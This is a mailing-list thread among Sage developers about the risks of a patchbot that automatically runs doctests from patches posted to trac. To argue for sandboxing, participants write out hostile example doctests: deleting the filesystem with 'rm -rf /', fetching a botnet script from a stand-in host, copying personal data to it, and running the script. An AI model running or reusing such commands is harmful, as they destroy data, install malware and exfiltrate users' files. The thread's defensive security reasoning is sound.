On 2/15/12 12:59 PM, William Stein wrote:
On Wed, Feb 15, 2012 at 10:31 AM, kcrisman<[email protected]> wrote:
expected behavior.
It does always timeout. The regular doctests take 1300 seconds for
sandpile.py! I need to figure out what's going on there.
I think at this point manual intervention is required. Or was there
something else you were thinking it should do (because clearly you
were surprised, which isn't the intent).
Well, I wasn't *too* surprised. I guess I was hoping for everything to
work perfectly with no intervention. But it does seem to be working now,
with a longer timeout.
Some followup (#10702 notwithstanding):
So I tried out the patchbot. Seemed to work reasonably well at
first.
Then I came into my office this morning. Computer was humming at a
VERY decent clip; I could not get the screen to appear, Ctrl-C did
nothing, nothing nothing nothing, but clearly very busy (testing,
perhaps). I had to restart it manually.
Yikes!
I'm still worried -- what if some jerk posts a patch to trac that contains
sage: os.system('rm -rf /')
Got you!
I think a patch like the above is a very real possibility. All that
would have to happen would be for one of the 500 trac accounts (which
sometimes have very dumb passwords) to be compromised, or for somebody
to get a trac account, and boom -- some users running a patchbot loose
everything. That's not a pretty thought.
or
sage: email('SPAM MESSAGE')
hahaha
or
sage: os.system('wget ...') # download rootkit
pwned!
or
sage: os.system("wget http://baddomain.com/joinbotnet.sh";)
sage: os.system("scp allyourpersonaldata.tar.gz baddomain.com")
sage: os.system("joinbotnet.sh")
I would definitely want this thing sandboxed as much as possible,
preferably running on a virtual machine that is completely firewalled
off from the net, except communication with the patch server.
Really, if you are running a patchbot, you are giving everyone in the
world permission to execute arbitrary code as the patchbot user.
Jason
--
To post to this group, send an email to [email protected]
To unsubscribe from this group, send an email to
[email protected]
For more options, visit this group at http://groups.google.com/group/sage-devel
URL: http://www.sagemath.org
